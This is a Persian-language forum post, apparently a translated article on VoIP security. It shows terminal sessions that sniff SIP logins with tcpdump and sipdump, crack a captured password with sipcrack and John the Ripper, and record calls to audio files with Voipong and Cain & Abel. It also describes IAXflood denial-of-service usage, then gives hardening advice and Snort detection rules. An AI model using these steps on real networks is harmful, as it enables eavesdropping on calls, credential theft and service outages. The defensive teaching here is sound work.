1 hosts scanned, 1 ICMP reachable, 51SIP enabled

فهرست 1

dimebag SIPcrack-0.1 # tcpdump -s 0 -w net-capture.txt udp -i eth0

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

237 packets captured

474 packets received by filter

0 packets dropped by kernel

فهرست 2

dimebag SIPcrack-0.1 # ./sipdump -d sip-logins.dump -f net-capture.txt

SIPdump 0.1 ( MaJoMu |

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.
)

------------------------------------------------

* Using tcpdump data file 'net-capture.txt' for sniffing

* Starting to sniff with filter 'tcp or udp'

* Adding 192.168.123.92:50195 192.168.123.99:50451 to monitor list...id 0

* New traffic on monitored connection 0 (192.168.123.92 -> 192.168.123.99)

* Found challenge response (192.168.123.92:50195 192.168.123.99:50451)

* Wrote sniffed login 192.168.123.92 -> 192.168.123.99 (User: '201') to dump file

* Exiting, sniffed 1 logins

فهرست 3

براي فراهم كردن امكان استفاده از فهرست واژگان موجود در ساير نرم‌افزارها (براي مثال John the Riper) به ترتيب زير يك فايل fifo pip ايجاد كنيد:

dimebag SIPcrack-0.1 # mkfifo fifosipcrack

براي شروع ‌كار نرم‌افزار John the Riper در يك ترمينال ديگر و ارسال رونوشت‌ها به Sipcrack (فهرست4) عبارات زير را اجرا كنيد:

 

dimebag SIPcrack-0.1 # john --

incremental=alnum --stdout=8 >

fifosipcrack

در مورد اين مثال و پيامدهاي انجام آن دوباره فكر كنيد. در يك زيرساخت VoIP ممكن است به سهولت اعتبارنامه خود را از دست بدهيد. يكي از راه‌حل‌هاي رفع چنين مشكلي مي‌تواند استفاده از كانال‌هاي كدشده همراه VPN يا SIP روي TLS(سرنام Transport Layer Security) باشد. روي پروتكل IAX v2 نيز با استفاده از سيستم اعتبارسنجي مبتني بر MD5 مي‌توان تحليل مشابهي را انجام داد.

(sipcrack in action)

dimebag SIPcrack-0.1 # ./sipcrack -w fifosipcrack -d sip-logins.dump

SIPcrack 0.1 ( MaJoMu |

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.
)

--------------------------------------------------

* Reading and parsing dump file...

* Found Accounts:

Num Server Client User Algorithm Hash / Password

1 192.168.123.99 192.168.123.92 201 MD5 dfc9979f98f0c546 c08dc3073dda1cc1

* Select which entry to crack (1 – 1): 1

* Generating static MD5 hash...e71899168871bb8929ff6c25aab955b2

* Starting bruteforce against user ‘201’ (MD5 Hash: ‘dfc9979f98f0c546c08dc3073dda1cc1’)

* Loaded wordlist: ‘fifosipcrack’

* Tried 25 passwords in 0 seconds

* Found password: ‘1234’

* Updating ‘sip-logins.dump’...done

فهرست 4

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

شكل 3 - نمايي از برنامه Cain & Abel

لینک به دیدگاه

Fahim    9563

Fahim
  • مالک
ارسال شده در

ضبط و بررسي تماس‌ها

با بررسي نمودار ترسيم شده توسط ابزار Wireshark متوجه مي‌شويد كه ارتباطات مؤثر بر اساس پروتكل RTP برقرار مي‌شوند. براي شناسايي مشكلات احتمالي در فرآيند ضبط و بررسي از ابزار Voipong استفاده مي‌كنيم. ابزار Voipong يك ردياب شبكه است كه امكان ضبط و بررسي تماس‌هاي VoIP را روي چندين پروتكل (مانند SIP، H323 و پروتكل Skinni Client محصول شركت سيسکو) فراهم مي‌كند. به علاوه با استفاده از اين ابزار مي‌توان تماس‌هاي واضح را روي RTP يافته و پس از كدگشايي آن‌ها را در يك فايل wav. ذخيره كرد. ابزار Voipong را مي‌توان از وب‌سايت توسعه‌دهنده آن در قالب يك برنامه قابل اجرا و بدون نياز به نصب روي هاردديسك دريافت كرد. با استفاده از ماجول‌هاي DSOM (سرنام Dynamic Shared Object Modules) مي‌توان ساختار كدگشايي ابزار مذكور را توسعه داد، اما در نسخه 2 رمزگشاهاي G711– law و G711 a-law به‌طور پيش‌فرض پشتيباني شده‌اند. اين رمزگشاها به دليل كيفيت بالاي فايل‌هاي صوتي خروجي، متداول‌ترين نمونه‌هاي موجود در ترمينال‌هاي LAN هستند. برنامه رسوخ‌گر براي عملكرد صحيح نيازمند كتابخانه‌هاي libcap و براي ساخت فايل wav. نيازمند كتابخانه sox‌ است. پس از كامپايل و نصب نرم‌افزار، بايد آن را با استفاده از فايل voipong.conf پيكربندي كنيد(فهرست5).

(file di configurazione voipong.conf)

[GENERAL]

logdir = /var/log

logfile = voipong.log

cdrfile = /var/log/voipcdr.log

networksfile = /usr/local/etc/voipong/voipongnets

pidfile = /var/run/voipong.pid

mgmt_ipcpath = /tmp/voipongmgmt.sock

soxpath = /usr/bin/sox

soxmixpath = /usr/bin/soxmix

modpath = /usr/local/etc/voipong/modules

mixwaves = 0

defalg = lfp

rtp_idle_time = 10

device = eth0

promisc = 1

snaplen = 1500

readtmt = 500

outdir = /var/log/voipong/

[FILTERS]

startup = “udp”

فهرست 5

به‌علاوه براي تعيين موقعيت فايل موردنظر براي رسوخ بايد به ترتيب زير از فايل voipongnest استفاده كنيد:

192.168.3.0/255.255.255.0 lfp

عبارت LFP (سرنام Least False Positive) به الگوريتم مورد استفاده براي شناسايي تماس‌هاي VoIP اشاره دارد. براي اطلاعات بيشتر مي‌توانيد به اسناد آنلاين اين نرم‌افزار مراجعه كنيد. ابزار Voipong به عنوان يك رسوخ‌گر عادي شبكه نيازمند فعال‌سازي حالت listen با استفاده از يك رابط شبكه است كه توانايي يافتن تمام ترافيك VoIP را دارد. ما براي رسيدن به اين هدف از چندين گزينه مختلف بهره مي‌گيريم:

- نصب برنامه روي سيستم گيت‌وي شبكه VoIP

- استفاده از يك رابط شبكه كه به پورت نظارت سوييچ متصل مي‌شود.

- استفاده از يك رابط شبكه مشترك با يك هاب

- تكنيك Poisoning ARP

- تكنيك Wwitch Flooding

هنگام شروع كار با Voiponing مي‌توان برنامه رسوخ‌گر را در حالت پس‌زمينه‌فعال كرده و با استفاده از كنسول Voipcti تماس‌ها را ضبط و بررسي كرد (فهرست6).

(voipong in background)

dimebag voipong-2.0 # ./voipong

EnderUNIX VOIPONG Voice Over IP Sniffer starting...

Release 2.0, running on dimebag [Linux 2.6.18 i686]

© Murat Balaban

برای مشاهده این محتوا لطفاً ثبت نام کنید یا وارد شوید.

dimebag voipong-2.0 #

dimebag voipong-2.0 # ./voipctl

Connected to VoIPong Management Console

System:

dimebag [Linux 2.6.18 i686]

voipong> shcall

ID NODE1 PORT1 NODE2 PORT2 STIME DURATION

----- ---------------- ----- ---------------- ----- ----------------- ------------

09534 192.168.123.99 05022 192.168.123.92 16260 13/02/07 17:26:32 9 seconds

Total listed: 1

فهرست 6

همان‌طور که در فهرست6 مشاهده مي‌كنيد، با استفاده از دستور Shcall مي‌توان ارتباط بين ميزبان 192.168.123.99 روي پورت udp به شماره 5022 و ميزبان 192.168.123.92 روي پورت udp به شماره 19260 را مشاهده كرد. با استفاده از كنسول مذكور مي‌توان اطلاعات مشاهده‌شده و گزينه‌هاي مربوط به سرور را پيكربندي كرد (فهرست7). در مثال موردبحث، به‌منظور گوش كردن مکالمه‌هاي درحال ضبط و بررسي، بايد دايركتوري موجود در فايل پيكربندي را در قالب گزينه Outdir باز كرده و فايل‌هاي wav. را جمع‌آوري كنيد.

voipong> help

Commands:

help : this one

quit : quit management console

uptime : Server uptime

logrotate : rotate server's logs

setdebug [level] : set debug level to [level]

setmixflag [flag] : set mix voice flag to true or false [e.g: 1 for true, 0 for false]

shutdown : shutdown server

rusage : CPU usage statistics for the server

loadnets : Reload voipongnets file

info : General server information

shcall : Show currently monitored calls

shrtcp : Show currently RTCP cache

killcall [id] : end monitoring session with [id]

فهرست 7

با استفاده از ابزار Cain & Abel روي كامپيوتري با سيستم‌عامل ويندوز امكان آرشيو كردن نتايج وجود دارد. اين كار توسط يك برنامه رسوخ‌گر انجام مي‌شود كه قابليت ضبط و بررسي تماس‌هاي كد شده توسط كدگذارهاي G711 Law ،G771 aLaw ،ADPCM، DVI4 ،LPC ،GSM610 ،Microsoft GSM ،L16 ،G729 ،Speex،iLBC،G722.1 ،G723.1 ،G726-16 ،G726-24 ،G726-32 ،G726-40 و LPC-10 را دارد. با انتخاب اين رسوخ‌گر مي‌توانيد تماس‌ها را با كدگذار مربوط ببينيد. البته اين تماس‌ها پس از كدگشايي در قالب فايل‌هاي wav. درون همان دايركتوري كه ابزار Cain & Abel نصب شده، ذخيره مي‌شوند. با استفاده از اين ابزارهاي توانمند ضبط و بررسي تماس‌هاي تلفني كه با بهره‌گيري از پروتكل‌هاي فعال در حالت Clear برقرار مي‌شوند، بسيار ساده بوده و به بهره‌گيري از تكنيك‌هاي رمزگذاري نيازي نيست. براي اجتناب از اين مشكلات بهتر است از كانال‌هاي VPN يا پروتكل SRTP ‌استفاده شود. به همين ترتيب،‌ پخش فايل‌هاي صوتي كه پروتكل IAX v2 در حالت clear از آن پشتيباني مي‌كند، قابل نفوذ است. با وجود اين، سازندگان پروتكل اخير راه‌حلي را براساس به‌كارگيري يك كانال كدشده توسط AES ارائه كرده‌اند كه هنوز به‌طور رسمي اعلام نشده است. شكل3 نمايي از برنامه Cain & Abel را نشان مي‌دهد.

dimebag ~ # cd /var/log/voipong/20070213/

dimebag 20070213 # ls

session-enc0-PCMU-8KHz-192.168.123.92,16260-192.168.123.99,5022.raw

session-enc0-PCMU-8KHz-192.168.123.92,19088-192.168.123.99,5026.raw

session-enc0-PCMU-8KHz-192.168.123.99,5022-192.168.123.92,16260.raw

session-enc0-PCMU-8KHz-192.168.123.99,5022-192.168.123.92,16260.wav

session-enc0-PCMU-8KHz-192.168.123.99,5026-192.168.123.92,19088.raw

session-enc0-PCMU-8KHz-192.168.123.99,5026-192.168.123.92,19088.wav

فهرست 8

 

حمله‌هاي DoSيكي از چالش‌هاي پروتكل‌هاي SIP و IAX v2 حمله‌هاي Denial of Service يا ممانعت از خدمات است. با استفاده از زبان برنامه‌نويسي Perl به سادگي مي‌توان ابزارهايي را ايجاد كرد كه قابليت ارسال بسته‌هاي DoS را داشته باشند. براي انجام اين كار مي‌توان از كتابخانه‌هاي CPAN كه به‌طور خاص براي پروتكل طراحي شده‌اند، بهره‌گرفت يا برنامه‌هايي مانند SIPBomber، IAXflood و SIPsak را مورد استفاده قرار داد. برنامه IAXflood بسيار توانمند بوده و كاربردي ساده دارد. هنگام استفاده از پروتكل IAX اين برنامه مي‌تواند بسته‌هاي DoS را روي يك سرور VoIP ايجاد كند. براي كار با اين برنامه بايد مرجع موردنظر و شماره بسته را به ترتيب زير تعيين كنيد:

 

usage: ./iaxflood sourcename

destinationname numpackets

براي اين كار بايد امكان دسترسي مستقيم به مرجع و مقصد برنامه، بدون نياز به سيستم NAT از طريق آدرس IP شما فراهم باشد. هدف از به‌كارگيري اين بسته‌ها، كاهش كيفيت خدمات به‌گونه‌اي است كه در نهايت سرور مسدود شود.

جمع‌بندي و پيشنهاد

بر اساس نوع زيرساخت، بايد به موضوعات امنيتي مقتضي توجه كنيد. در ادامه برخي از اين موضوعات فهرست شده است:

- خطوط PSTN يا ISDN را براي بسته‌هاي صوتي حفظ كنيد.

- با استفاده از UPS يك سيستم پشتيبان نيرو و انتقال توان به شبكه اترنت به‌منظور تأمين توان ترمينال‌ها، طراحي كنيد.

- خدمات در حالت Clear يا خدمات اعتبار سنجي ضعيف حفاظت نشده را به حداقل ممكن برسانيد. تلفن‌ها و رابط‌هاي مديريت را بدون حفاظت در اينترنت باقي نگذاريد.

- براي مديريت ترمينال‌ها از كلمات عبور امن استفاده كنيد.

- با استفاده از VLAN در شبكه خصوصي خود ترافيك اطلاعات و VoIP‌ را تقسيم كنيد.

- در صورت امكان از تجهيزاتي استفاده كنيد كه از كدگذاري فايل‌هاي صوتي توسط پروتكل SRTP پشتيباني مي‌كنند.

- كيفيت خدمات را مديريت كنيد.

- با استفاده از VPN ipsec يا tls براي ترافيك VoIP از كانال‌هاي كد شده بهره بگيريد.

- استفاده از منابع شبكه را (به‌عنوان مثال با استفاده از برنامه

source IP control) محدود كنيد.

- از ديوارهاي آتش سطح برنامه (مانند SIP/IAX) استفاده كنيد.

- از سيستم‌هاي اجتناب از تداخل

(Intrusion Prevention System) استفاده كنيد. استفاده از سيستم‌هاي IPS براي مقابله از حمله‌هاي DoS روي پروتكل‌هاي VoIP ضروري است. اين سيستم‌ها در سطح برنامه‌ها فعال بوده و به همين دليل امكان تداخل آن‌ها با تجهيزات ISO/OSI سطح3 وجود ندارد. سيستم استاندارد حفاظتي IDS/IPS با عنوان Snort شناخته مي‌شود كه حالت ورودي سيستم IPS را كنترل مي‌كند.پروتكل SIP معمولاً دچار مشكلات امنيتي است. در سيستم Snort قواعد خاصي براي حفاظت از اين پروتكل در مقابل متداول‌ترين حمله‌ها وجود دارد. براي اطلاع بيشتر به فهرست9 مراجعه كنيد. اين بخش از قوانين به منظور محافظت دائمي از سيستم‌هاي آسيب‌پذير كه يك فاكتور اصلي در خدمات VoIP محسوب مي‌شود، طراحي شده است. در فهرست10 مي‌توانيد مثالي از نحوه مقابله با يك آسيب‌پذيري شناخته شده را ببينيد. اين قاعده (كه از انجمن Snort اخذ شده) از سيستم در مقابل تجاوزات مضر احتمالي حفاظت مي‌كند.

# this set are for general SIP specific flooding

drop ip any any -> $HOME_NET 5060 (msg:"BLEEDING-EDGE VOIP INVITE Message Flood"; content:"INVITE"; depth:6; threshold: type both , track by_src, count 100, seconds 60

; classtype:attempted-dos; sid:2003192; rev:1;)

drop ip any any -> $HOME_NET 5060 (msg:"BLEEDING-EDGE VOIP REGISTER Message Flood"; content:"REGISTER"; depth:8; threshold: type both , track by_src, count 100, second

s 60; classtype:attempted-dos; sid:2003193; rev:1;)

#from the rules at nextsoft.cz

#intended to catch unusual numbers of unauthorized responses from sip servers

drop ip $HOME_NET 5060 -> any any (msg:"BLEEDING-EDGE VOIP Multiple Unathorized SIP Responses"; content:"SIP/2.0 401 Unauthorized"; depth:24; threshold: type both, tra

ck by_src, count 5, seconds 360; classtype:attempted-dos; sid:2003194; rev:1;)

فهرست9

(snort rules)

#Rule submitted by rmkml

drop udp $EXTERNAL_NET any -> $HOME_NET 5060 (msg:"COMMUNITY EXPLOIT SIP UDP Softphone overflow attempt"; content:"|3B|branch|3D|"; content:"a|3D|"; pcre:"/^a\x3D[^\n]{1000,}/smi"; reference:bugtraq,16213; reference:cve,2006-0189; classtype:misc-attack; sid:100000223; rev:1;)

فهرست10

لینک به دیدگاه
رفتن به فهرست موضوع ها
×
×
  • اضافه کردن...